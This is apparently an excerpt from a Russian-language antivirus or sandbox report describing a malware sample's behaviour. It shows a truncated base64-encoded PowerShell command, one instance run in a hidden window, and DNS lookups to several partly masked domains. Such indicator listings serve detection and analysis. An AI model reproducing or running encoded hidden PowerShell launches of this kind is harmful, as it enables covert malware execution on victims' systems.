Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABaAHoAawA5AGMANwA4AGwAPQAnAEwAagAwADIAOAB1AHAAJwA7ACQAVwBqAG4AcwB3AGEAdABkACAAPQAgACcAOQAyADAAJwA7ACQAQQBpAGMAcwBpADgAcQA9ACcAVQA1AHoAaQBiAHYAcwAnADsAJABUAGsANAB0AHAAegA3AHEAPQAkAGUAbg...
- DNS ASK li##ar.com
- DNS ASK li##am.org
- DNS ASK es###anum.com
- DNS ASK bl###-ether.com
- DNS ASK mi######m.hotelit.com.pk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABaAHoAawA5AGMANwA4AGwAPQAnAEwAagAwADIAOAB1AHAAJwA7ACQAVwBqAG4AcwB3AGEAdABkACAAPQAgACcAOQAyADAAJwA7ACQAQQBpAGMAcwBpADgAcQA9ACcAVQA1AHoAaQBiAHYAcwAnADsAJABUAGsANAB0AHAAegA3AHEAPQAkAGUAbg...' (со скрытым окном)